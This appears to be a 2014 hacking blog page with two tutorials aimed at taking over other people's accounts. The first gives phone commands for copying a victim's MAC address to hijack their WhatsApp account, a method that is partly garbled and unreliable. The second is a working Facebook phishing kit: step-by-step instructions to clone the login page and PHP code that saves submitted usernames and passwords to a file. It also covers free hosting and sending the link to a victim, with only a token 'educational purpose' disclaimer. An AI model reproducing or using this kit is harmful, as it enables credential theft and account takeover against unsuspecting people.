Tuesday, 25 November 2014

Whatsapp Hacking







1Hey Friends Today I am Sharing A Most Very Demanded Hacking Trick i.e Whatsapp Hacking Tricks that too in a very easy and simple way just follow the steps and hack anyone's whatspp account you want.

     
  1.First of all you need to uninstall your Whatsapp App Temporarily.
22.You need to obtain your victim’s phone for a few seconds.
33     Obtain your victim’s phone Media Access Control(MAC) address. It will be like (98:76:54:32:10:pq).
a)      To obtain your Victim’s MAC address follow these steps :
b)      For ANDROID- Settings/About Phone/Status/Wi-Fi MAC address.
c)      For iPHONE- Settings/General/About/ Wi-Fi  address.
d)     For WINDOWS phones- Settings/About/More Info/MAC address.
44.   Now Find Your MAC address usi1g the same process and write it somewhere securely.
55.       Now change your’s phone’s MAC address with that of your vistim’s Mac address.
a)      Just follow these steps to change your MAC address.
b)      For iPhone- You need to install a MAC spoofing app like WifiSpoof or MacDaddy X to change you MAC address.
c)      For ANDROID- You need to install BusyBox and the Terminal Emulator apps. In the terminal ,type “ip link show” to see a list of interfaces.
Identify the one that has your MAC  address- for example, we will use the eth0 interface. In the terminal emulator, enter “ip link set eth0 address 98:76:54:32:10:pq” and “ip link set eth0 broadcast 98:76:54:32:10:pq”, where eth0 is the interface you identified and  98:76:54:32:10:pq is your victim’s MAC address. To check that you have successfully changed your MAC address, enter “ip link show eth0.”
66.     Now you successfully changed your MAC address to your victim’s MAC address.
77.     Now just install the Whatsapp app and register with your victim’s mobile number.
88      You may need your victim’s mobile for a few seconds again to confirm your number while registering with his mobile number.
99.   Now when you want to use your own whatsapp you just need to replace that MAC address with your original one.

Enjoyy...!!


Tuesday, 4 November 2014

Hacking Facebook Accounts By Phishing

Hey Friends today I am going to explain the most common way of hacking a facebook account. Yes today I am going to explain phishing and how to create a phishing site to hack people facebook account.

 

First of all we should know that what is phishing.



PHISHING :



Phishing means creating a similar looking page of the website of which you want to hack your victim's password. It is an illegal method of acquiring the password of other people by creating a similar looking page and then allowing the victim to enter his account password in the particular page. After the victim enters his password he is redirected to the original site and his password comes to you.

Now let's see how to do it.




manishricksandfun.blogspot.in
                                                                         


To create a phishing page just follows these simple steps :-

1.First of all just go to the original facebook page and right click on the original facebook page.Then you will see a option of VIEW PAGE SOURCE.




manishricksandfun.blogspot.in
                                          
2.Now a new tab will open which will be containing some codes(See image below).Now copy all the code shown there and paste it in a new notepad document.
3.Now open the notepad and press CTRL+F which will open the search dialog box and then type ACTION in that.     


manishricksandfun.blogspot.in
                                                  

                                           
4.You will have to find a text which looks like ..

                                       action="https://www.facebook.com/login.php?login_attempt=1"

5.Delete all the text written in blue colour and instead of it write post.php.then it will look like...

                                                 action="post.php"

6.Now save that document with the name index.htm (Remember to use the extension .htm instead of html.)

7.Now your phishing page is ready.it will look like a pic given below .


manishricksandfun.blogspot.in
index

                                                   
8.Open a new notepad and save the given data with the name post.php.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

9.You have two files now one is index.htm and another is post.php.

10.Now open 000webhost (It is a web hosting website)

                           
manishricksandfun.blogspot.in
                                              

11.You have to make a account in that ,after that it looks like a picture given below.



manishricksandfun.blogspot.in
                                                                          
12.After that create a website with any domain of your choice.

13.After creating your site go to control pannel,then on file manager.

14.After that a new window will pop up.Now go to public_html.


manishricksandfun.blogspot.in
                                           
                                        

15.Delete the file named default.php,after then upload two files index.htm and post.php one by one .



manishricksandfun.blogspot.in
                                        
16.Now the last step click on view of index.htm it will look same as facebook page.



manishricksandfun.blogspot.in
                                         

17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .The page redirectly connect to facebook. and you will be now able to see his password.

18.After your victim enters his password in your phishing site open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
                                


manishricksandfun.blogspot.in
                                        

19.Click on view and now your victim's password is there.


manishricksandfun.blogspot.in
                                           


note:

phishing is a illegal activity so don't try on anyone.this tutorial is for educational purpose.
Not only Facebook u can make any phishing page of any website by following these steps....
u can hack Gmail,Yahoo,Orkut,Twitter and many more.....